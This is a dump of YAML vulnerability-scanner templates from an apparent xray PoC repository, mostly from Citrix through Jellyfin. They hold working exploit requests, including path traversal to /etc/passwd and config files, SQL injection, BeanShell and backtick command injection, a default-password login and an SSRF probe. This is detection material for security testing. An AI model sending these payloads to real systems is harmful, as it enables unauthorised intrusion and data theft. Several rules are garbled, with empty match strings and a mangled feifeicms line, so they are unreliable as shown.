10 | body: frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password= 11 | follow_redirects: false 12 | expression: response.status == 302 && response.headers["location"] == "/menu.gch" 13 | expression: r0() 14 | detail: {} 15 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/citrix-cve-2019-19781-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-cve-2019-19781-path-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /vpn/../vpns/cfg/smb.conf 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order") 12 | expression: r0() 13 | detail: 14 | author: su(https://suzzz112113.github.io/#blog) 15 | links: 16 | - https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/ 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/citrix-xenmobile-cve-2020-8209.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-xenmobile-cve-2020-8209 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: B1anda0(https://github.com/B1anda0) 15 | links: 16 | - https://nvd.nist.gov/vuln/detail/CVE-2020-8209 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/coldfusion-cve-2010-2861-lfi.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-coldfusion-cve-2010-2861-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=") 12 | expression: r0() 13 | detail: 14 | author: sharecast 15 | links: 16 | - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 17 | version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/confluence-cve-2015-8399.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2015-8399 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /spaces/viewdefaultdecorator.action?decoratorName 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator") 12 | expression: r0() 13 | detail: 14 | author: whynot(https://github.com/notwhy) 15 | links: 16 | - https://www.anquanke.com/vul/id/1150798 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/consul-rexec-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-consul-rexec-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /v1/agent/self 10 | expression: 'response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")' 11 | expression: r0() 12 | detail: 13 | author: 
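imlonghao(https://imlonghao.com/) 14 | links: 15 | - https://www.exploit-db.com/exploits/46073 16 |
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/consul-service-rce.yml:
--------------------------------------------------------------------------------
# Configuration check only: reads the agent's self-description and reports
# when script checks are switched on. No command is sent to the target.
# Remediation is on the Consul side: turn off enable_script_checks (or limit
# it with enable_local_script_checks) and require ACL tokens for the agent API.
name: poc-yaml-consul-service-rce
manual: true
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /v1/agent/self
        # && binds tighter than ||, so without the parentheses the
        # EnableRemoteScriptChecks alternative matched on its own, with no
        # status or content-type gate. Grouping the two flags keeps both
        # alternatives behind the same 200 + JSON precondition.
        expression: 'response.status == 200 && response.content_type.contains("json") && (response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true"))'
expression: r0()
detail:
    author: imlonghao(https://imlonghao.com/)
    links:
        - https://www.exploit-db.com/exploits/46074
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/coremail-cnvd-2019-16798.yml:
--------------------------------------------------------------------------------
name: poc-yaml-coremail-cnvd-2019-16798
manual: true
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /mailsms/s?func=ADMIN:appState&dumpConfig=/
            follow_redirects: false
        # NOTE(review): the literal passed to bytes() is empty in this listing
        # (markup inside the string looks to have been lost when the page was
        # extracted). An empty needle is contained in every body, so as shown
        # the rule reduces to "status == 200" and will flag unrelated hosts.
        # Restore the marker from the upstream template before trusting results.
        expression: response.status == 200 && response.body.bcontains(bytes(""))
expression: r0()
detail:
    author: cc_ci(https://github.com/cc8ci)
    links:
        - https://www.secpulse.com/archives/107611.html
-------------------------------------------------------------------------------- /pocs_yml/xrayFiles/couchdb-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-couchdb-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /_config 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && 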
response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager") 12 | expression: r0() 13 | detail: 14 | author: FiveAourThe(https://github.com/FiveAourThe) 15 | links: 16 | - https://www.seebug.org/vuldb/ssvid-91597 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/dedecms-cve-2018-6910.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-cve-2018-6910 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /include/downmix.inc.php 10 | expression: response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()")) 11 | expression: r0() 12 | detail: 13 | author: PickledFish(https://github.com/PickledFish) 14 | links: 15 | - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/dedecms-cve-2018-7700-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-cve-2018-7700-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(2000000000, 2100000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5{{r}};{/dede:field} 12 | follow_redirects: true 13 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r)))) 14 | expression: r0() 15 | detail: 16 | author: harris2015(https://github.com/harris2015) 17 | links: 18 | - https://xz.aliyun.com/t/2224 19 | Affected Version: V5.7SP2正式版(2018-01-09) 20 | -------------------------------------------------------------------------------- 
/pocs_yml/xrayFiles/dedecms-membergroup-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-membergroup-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{r}})+--+@`'` 12 | follow_redirects: true 13 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r)))) 14 | expression: r0() 15 | detail: 16 | author: harris2015(https://github.com/harris2015) 17 | links: 18 | - http://www.dedeyuan.com/xueyuan/wenti/1244.html 19 | Affected Version: 5.6,5.7 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/dedecms-url-redirection.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-url-redirection 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t 10 | follow_redirects: false 11 | expression: response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com" 12 | expression: r0() 13 | detail: 14 | author: cc_ci(https://github.com/cc8ci) 15 | links: 16 | - https://blog.csdn.net/ystyaoshengting/article/details/82734888 17 | Affected Version: V5.7 sp1 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/discuz-wechat-plugins-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-wechat-plugins-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /plugin.php?id=wechat:wechat&ac=wxregister 10 | follow_redirects: false 11 | expression: response.status 
== 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com") 12 | expression: r0() 13 | detail: 14 | author: JrD 15 | links: 16 | - https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI 17 |
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/dlink-cve-2019-17506.yml:
--------------------------------------------------------------------------------
# Checks whether /getcfg.php answers an unauthenticated POST with an XML
# document. A positive result means the device returns account configuration
# without a session; treat any captured response as containing credentials.
name: poc-yaml-dlink-cve-2019-17506
manual: true
transport: http
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /getcfg.php
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
            follow_redirects: false
        # NOTE(review): both bcontains() literals are empty in this listing
        # (the markup they held appears to have been stripped on extraction).
        # Empty needles always match, so as shown the rule fires on any
        # 200 response with an XML content type. Restore the two element
        # markers from the upstream template to avoid false positives.
        expression: response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"") && response.body.bcontains(b"")
expression: r0()
detail:
    author: l1nk3r,Huasir(https://github.com/dahua966/)
    links:
        - https://xz.aliyun.com/t/6453
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/dlink-cve-2020-25078-account-disclosure.yml:
--------------------------------------------------------------------------------
# Checks whether /config/getuser returns the admin account record to an
# unauthenticated GET. The matched body carries the account password, so scan
# output and cached responses for this rule should be handled as secrets.
name: poc-yaml-dlink-cve-2020-25078-account-disclosure
manual: true
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /config/getuser?index=0
            follow_redirects: false
        # NOTE(review): this rule indexes response.headers with the exact key
        # "Content-Type", while other rules in this listing use
        # response.content_type or lower-case header keys. Whether the header
        # map is case-normalised is not visible here; confirm, otherwise a
        # device sending a differently-cased header is missed.
        expression: response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")
expression: r0()
detail:
    author: kzaopa(https://github.com/kzaopa)
    links:
        - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/docker-api-unauthorized-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-docker-api-unauthorized-rce 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /info 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir") 12 | expression: r0() 13 | detail: 14 | author: j4ckzh0u(https://github.com/j4ckzh0u) 15 | links: 16 | - https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/druid-monitor-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-druid-monitor-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /druid/index.html 10 | expression: response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers") 11 | expression: r0() 12 | detail: 13 | author: met7or 14 | links: 15 | - https://github.com/alibaba/druid 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/duomicms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-duomicms-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005))) 10 | follow_redirects: false 11 | expression: response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935") 12 | expression: r0() 13 | detail: 14 | author: 
hanxiansheng26(https://github.com/hanxiansheng26) 15 | links: 16 | - https://xz.aliyun.com/t/2828 17 | Affected Version: duomicms<3.0 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/dvr-cve-2018-9995.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dvr-cve-2018-9995 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /device.rsp?opt=user&cmd=list 10 | headers: 11 | Cookie: uid=admin 12 | follow_redirects: true 13 | expression: response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b"playback") 14 | expression: r0() 15 | detail: 16 | author: cc_ci(https://github.com/cc8ci) 17 | links: 18 | - https://s.tencent.com/research/bsafe/474.html 19 | Affected Version: DVR 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/e-zkeco-cnvd-2020-57264-read-file.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-e-zkeco-cnvd-2020-57264-read-file 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /iclock/ccccc/windows/win.ini 10 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 11 | expression: r0() 12 | detail: 13 | author: ThestaRY (https://github.com/ThestaRY7/) 14 | links: 15 | - https://www.cnvd.org.cn/flaw/show/CNVD-2020-57264 16 | info: E-ZKEco readfileCNVD-2020-57264 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/ecology-filedownload-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-filedownload-directory-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | 
path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"/weaver/") 12 | expression: r0() 13 | detail: 14 | author: l1nk3r 15 | links: 16 | - https://www.weaver.com.cn/cs/securityDownload.asp 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/ecology-javabeanshell-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-javabeanshell-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(40000, 44800) 6 | r2: randomInt(40000, 44800) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /weaver/bsh.servlet.BshServlet 13 | body: bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw 14 | follow_redirects: false 15 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 16 | expression: r0() 17 | detail: 18 | author: l1nk3r 19 | links: 20 | - https://www.weaver.com.cn/cs/securityDownload.asp 21 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/ecology-springframework-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-springframework-directory-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml 10 | follow_redirects: false 11 | expression: response.status == 200 && response.body.bcontains(b"/weaver/") 12 | expression: r0() 13 | detail: 14 | author: l1nk3r 15 | links: 16 | - https://www.weaver.com.cn/cs/securityDownload.asp 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/ecology-syncuserinfo-sqli.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-ecology-syncuserinfo-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(40000, 44800) 6 | r2: randomInt(40000, 44800) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: GET 12 | path: /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({{r1}}*{{r2}}),null 13 | follow_redirects: true 14 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 15 | expression: r0() 16 | detail: 17 | author: MaxSecurity(https://github.com/MaxSecurity) 18 | links: 19 | - https://www.weaver.com.cn/ 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/ecshop-cnvd-2020-58823-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ecshop-cnvd-2020-58823-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(40000, 44800) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: POST 11 | path: /delete_cart_goods.php 12 | body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1)) 13 | expression: response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 14 | expression: r0() 15 | detail: 16 | author: 凉风(http://webkiller.cn/) 17 | links: 18 | - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/eea-info-leak-cnvd-2021-10543.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-eea-info-leak-cnvd-2021-10543 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /authenticationserverservlet 10 | expression: response.status == 200 && "(.*?)".bmatches(response.body) && "(.*?)".bmatches(response.body) 11 | expression: r0() 12 
| detail: 13 | author: Search?=Null 14 | links: 15 | - https://exp1orer.github.io 16 | description: MessageSolution Enterprise Email Archiving (EEA) Info Leak. 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/elasticsearch-cve-2015-3337-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-elasticsearch-cve-2015-3337-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd 10 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: X.Yang 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/etouch-v2-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-etouch-v2-sqli 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)' 10 | expression: response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b") 11 | expression: r0() 12 | detail: 13 | author: MaxSecurity(https://github.com/MaxSecurity) 14 | links: 15 | - https://github.com/mstxq17/CodeCheck/ 16 | - https://www.anquanke.com/post/id/168991 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/fangweicms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-fangweicms-sqli 2 | manual: true 3 | transport: http 4 | 
set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: Rexus 16 | links: 17 | - http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/ 18 | Affected Version: "4.3" 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/feifeicms-lfr.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-feifeicms-lfr 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?s=Admin-Data-down&id=../../Conf/config.php 10 | expression: response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") 12 | expression: r0() 13 | detail: 14 | author: l1nk3r(http://www.lmxspace.com/) 15 | links: 16 | - http://foreversong.cn/archives/1378 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/flink-jobmanager-cve-2020-17519-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-flink-jobmanager-cve-2020-17519-lfi 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 10 | expression: response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body) 11 | expression: r0() 12 | detail: 13 | author: MaxSecurity(https://github.com/MaxSecurity) 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519 16 | 
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/gilacms-cve-2020-5515.yml:
--------------------------------------------------------------------------------
# Scanner check for GilaCMS CVE-2020-5515 (identifier taken from the rule name).
# The request asks the /admin/sql endpoint to compute the MD5 of a random integer;
# a hit means the submitted SQL was evaluated and its result returned.
# NOTE(review): the path is under /admin; whether the scanner sends an
# authenticated session is not visible in this rule - confirm before triage.
name: poc-yaml-gilacms-cve-2020-5515
manual: true
transport: http
set:
  # Fresh random value per run, so a static or cached page cannot satisfy the match.
  r1: randomInt(200000000, 210000000)
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /admin/sql?query=SELECT%20md5({{r1}})
    # Matches on the echoed hash only; no status-code condition is applied.
    expression: response.body.bcontains(bytes(md5(string(r1))))
expression: r0()
detail:
  author: PickledFish(https://github.com/PickledFish)
  links:
    - https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-admin-sqlquery-sql-injection/
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/glassfish-cve-2017-1000028-lfi.yml:
--------------------------------------------------------------------------------
# Scanner check for GlassFish CVE-2017-1000028 (identifier taken from the rule name).
# A hit means a path using overlong-encoded dot segments returned the contents
# of a MANIFEST.MF file, i.e. the server resolved the traversal.
name: poc-yaml-glassfish-cve-2017-1000028-lfi
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF
      follow_redirects: true
    # Requires HTTP 200 plus two manifest header names in the body.
    expression: response.status == 200 && response.body.bcontains(b"Ant-Version:") && response.body.bcontains(b"Manifest-Version:")
expression: r0()
detail:
  author: sharecast
  links:
    - https://github.com/vulhub/vulhub/tree/master/glassfish/4.1.0
  # NOTE(review): "<4.1.0" and the linked 4.1.0 test environment disagree on
  # whether 4.1.0 itself is affected - confirm against the vendor advisory.
  version: <4.1.0
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/grafana-default-password.yml:
--------------------------------------------------------------------------------
# Scanner check for a Grafana instance that still accepts the admin/admin login.
# A hit means the default administrator password was never changed; rotate it
# and review the account's activity.
# NOTE(review): this rule performs a real login attempt, which presumably shows
# up in the target's authentication logs - confirm this is in scope for the scan.
name: poc-yaml-grafana-default-password
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: POST
      path: /login
      headers:
        Content-Type: application/json
      body: '{"user":"admin","password":"admin"}'
      follow_redirects: false
    # Success is HTTP 200 with the JSON message "Logged in".
    expression: response.status == 200 && response.body.bcontains(b"\"message\":\"Logged in\"")
expression: r0()
detail:
  author: For3stCo1d (https://github.com/For3stCo1d)
  description: "grafana-default-password"
  links:
    - https://www.jianshu.com/p/dd27f6a48cf8
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/hadoop-yarn-unauth.yml:
--------------------------------------------------------------------------------
# Scanner check for a Hadoop YARN REST API that answers without credentials.
# The request only reads cluster information; a hit means the management API is
# reachable from the scanner's network position and should be placed behind
# authentication or network restrictions.
name: poc-yaml-hadoop-yarn-unauth
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /ws/v1/cluster/info
      headers:
        Content-Type: application/json
      follow_redirects: true
    # Requires HTTP 200, a JSON content type and two cluster-info field names.
    expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"resourceManagerVersionBuiltOn") && response.body.bcontains(b"hadoopVersion")
expression: r0()
detail:
  author: p0wd3r,sharecast
  links:
    - https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/hikvision-cve-2017-7921.yml:
--------------------------------------------------------------------------------
# Scanner check for Hikvision CVE-2017-7921 (identifier taken from the rule name).
# The request reads the device-information endpoint with a fixed "auth" query
# parameter; a hit means the device returned XML for it.
name: poc-yaml-hikvision-cve-2017-7921
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /system/deviceInfo?auth=YWRtaW46MTEK
      follow_redirects: false
    # NOTE(review): the last condition tests for an empty byte string as shown
    # here; that cannot narrow the match. The literal looks like it was lost when
    # this page was extracted - restore it from the upstream rule before relying
    # on this check, otherwise any 200 response typed application/xml may match.
    expression: response.status == 200 && response.headers["content-type"] == "application/xml" && response.body.bcontains(b"")
expression: r0()
detail:
  author: whwlsfb(https://github.com/whwlsfb)
  links:
    - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/huawei-home-gateway-hg659-fileread.yml:
--------------------------------------------------------------------------------
# Scanner check for an arbitrary file read on a Huawei HG659 home gateway
# (product taken from the rule name). A hit means the device returned a
# passwd-style file for a traversal path under /lib.
name: poc-yaml-huawei-home-gateway-hg659-fileread
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /lib///....//....//....//....//....//....//....//....//etc//passwd
    # Requires HTTP 200 and a root entry pattern anywhere in the body.
    expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
expression: r0()
detail:
  author: B1anda0(https://github.com/B1anda0)
  links:
    - https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=4210
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/inspur-tscev4-cve-2020-21224-rce.yml:
--------------------------------------------------------------------------------
# Scanner check for Inspur CVE-2020-21224 (identifier taken from the rule name).
# The login request carries an arithmetic expression over two random integers;
# a hit means the response contained their sum, i.e. the value was computed on
# the target rather than reflected.
name: poc-yaml-inspur-tscev4-cve-2020-21224-rce
manual: true
transport: http
set:
  # Two random operands per run; only the computed sum satisfies the match.
  r1: randomInt(800000000, 1000000000)
  r2: randomInt(800000000, 1000000000)
rules:
  r0:
    request:
      cache: true
      method: POST
      path: /login
      body: op=login&username=1 2\',\'1\'\);`expr%20{{r1}}%20%2b%20{{r2}}`
    # Requires HTTP 200, a JSON content type and the sum r1 + r2 in the body.
    expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string(r1 + r2)))
expression: r0()
detail:
  author: jingling(https://github.com/shmilylty)
  links:
    - https://github.com/NS-Sp4ce/Inspur
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/jboss-unauth.yml:
--------------------------------------------------------------------------------
# Scanner check for a JBoss JMX console that is served without authentication.
# A hit means the console page rendered for an unauthenticated GET; the console
# should be removed or placed behind authentication.
name: poc-yaml-jboss-unauth
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /jmx-console/
      follow_redirects: false
    # Redirects are not followed, so a redirect to a login page does not match.
    expression: response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web")
expression: r0()
detail:
  author: FiveAourThe(https://github.com/FiveAourThe)
  links:
    - https://xz.aliyun.com/t/6103
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/jellyfin-cve-2021-29490.yml:
--------------------------------------------------------------------------------
# Scanner check for Jellyfin CVE-2021-29490 (identifier taken from the rule name).
# The request asks the image endpoint to fetch an external URL; a hit means the
# response body mentions that host.
# NOTE(review): the indicator is only the string "baidu.com" in a 200 response,
# which an error page echoing the parameter could also satisfy - treat hits as
# needing confirmation. The probe also makes the target contact a third-party
# host; a scanner-controlled callback (as the jenkins rule in this directory
# uses) would be a stronger signal.
name: poc-yaml-jellyfin-cve-2021-29490
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /Images/Remote?imageUrl=http://baidu.com
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(bytes("baidu.com"))
expression: r0()
detail:
  author: 曦shen
  links:
